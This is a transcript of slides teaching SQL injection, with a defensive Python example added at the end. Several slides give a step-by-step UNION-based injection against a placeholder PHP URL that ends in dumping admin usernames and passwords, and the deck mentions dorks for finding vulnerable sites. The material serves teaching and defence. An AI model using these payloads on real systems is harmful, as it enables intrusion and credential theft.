SQL Injection Presentation Transcript
1. SQL Injection
2. What is SQL Injection?
SQL injection is often used to attack the security of a website by entering SQL statements into a web form so that a badly designed website dumps its database content to the attacker.
3. Real World Examples
On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two unnamed Russians with the theft of 130 million credit card numbers using an SQL injection attack.
In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
4. Important Syntax
5. Google dorks to find SQL vulnerable website
6. PHP Based SQL Injection
After finding a website link, we have to start the SQL injection attack on the website.
http://www.website.com/photo-category.php?id=11' (Test whether the site is vulnerable or not. If it is vulnerable, an error or a blank page will be displayed.)
After that, http://www.website.com/photo-category.php?id=11 order by 1-- (Find the number of columns in the database. If no error is displayed, proceed until you get an error page or a blank page.)
7. PHP Based SQL Injection
Checking for error page
http://www.website.com/photo-category.php?id=11 order by 2-- (No Error Page)
http://www.website.com/photo-category.php?id=11 order by 3-- (No Error Page)
http://www.website.com/photo-category.php?id=11 order by 4-- (No Error Page)
http://www.website.com/photo-category.php?id=11 order by 5-- (No Error Page)
http://www.website.com/photo-category.php?id=11 order by 6-- (Error Page. This means that there are 5 columns)
8.
http://www.website.com/photo-category.php?id=11 union all select 1,2,3,4,5-- (Will display a vulnerable column in the page, e.g. let's take 4 as the vulnerable one. Note: if nothing happened, use a "-", i.e. ?id=-11.)
or
http://www.website.com/photo-category.php?id=-11 union all select 1,2,3,4,5--
http://www.website.com/photo-category.php?id=11 union all select 1,2,3,group_concat(table_name),5 from information_schema.tables-- (Replace 4 with table_name; this will display all the tables. Select a table of users or admin, e.g. admin.)
9.
http://www.website.com/photo-category.php?id=11 union all select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name='admin'-- (This will display the columns of the admin table, e.g. username, password.)
http://www.website.com/photo-category.php?id=11 union all select 1,2,3,group_concat(username,0x3a,user_password),5 from admin-- (Displays the username and password.)
10. Tools used for Finding login page
11. SQL injection with tools
12. Blind SQL injection
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.
13. Example of Blind SQL injection
14. Example of Blind SQL injection
15. Prevention
Logic to allow only numbers / letters in username and password.
How should you enforce the constraint? SERVER SIDE.
'ESCAPE' bad characters. ' becomes \'
READ ONLY database access.
Remember this is NOT just for login areas! NOT just for websites!!
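The prevention points above, applied to the photo-category id parameter from the earlier slides. This is an added example, not part of the original presentation; it uses Python's sqlite3 module in place of the PHP site's database, and the table, rows and function names are constructed for illustration.

```python
import sqlite3

COLUMNS = "id, title, category, path, views"  # five columns, as in the slides' example

def make_db():
    """Constructed sample data; the connection is then switched to read-only."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT,
                             category TEXT, path TEXT, views INTEGER);
        INSERT INTO photos VALUES (11, 'Harbour', 'sea', '/img/11.jpg', 3);
        INSERT INTO photos VALUES (12, 'Chapel', 'St. John''s', '/img/12.jpg', 1);
    """)
    db.execute("PRAGMA query_only = ON")  # "READ ONLY database access"
    return db

def photo_vulnerable(db, raw_id):
    # 'Before': the request value becomes part of the SQL text itself.
    return db.execute(f"SELECT {COLUMNS} FROM photos WHERE id = " + raw_id).fetchall()

def photo_hardened(db, raw_id):
    # Server-side allow-list: ASCII digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a number")
    # Bound parameter: the value travels as data and is never parsed as SQL.
    sql = f"SELECT {COLUMNS} FROM photos WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def photos_by_category(db, category):
    # Free-text field: no hand escaping, the driver binds the value as-is.
    return db.execute("SELECT id FROM photos WHERE category = ?", (category,)).fetchall()

def outcome(fn, db, value):
    """Return the rows, or the name of the exception the call raised."""
    try:
        return fn(db, value)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    for value in ["11", "11'", "11 order by 6--"]:  # inputs taken from the slides
        print(repr(value), outcome(photo_vulnerable, db, value),
              outcome(photo_hardened, db, value))
    print(photos_by_category(db, "St. John's"))
    print(outcome(lambda d, v: d.execute(v).fetchall(), db, "DELETE FROM photos"))
```

In the concatenated version the database parses the slide inputs as SQL and its error behaviour depends on them; the hardened version rejects them before any query runs, and the read-only connection refuses writes even if a query were altered.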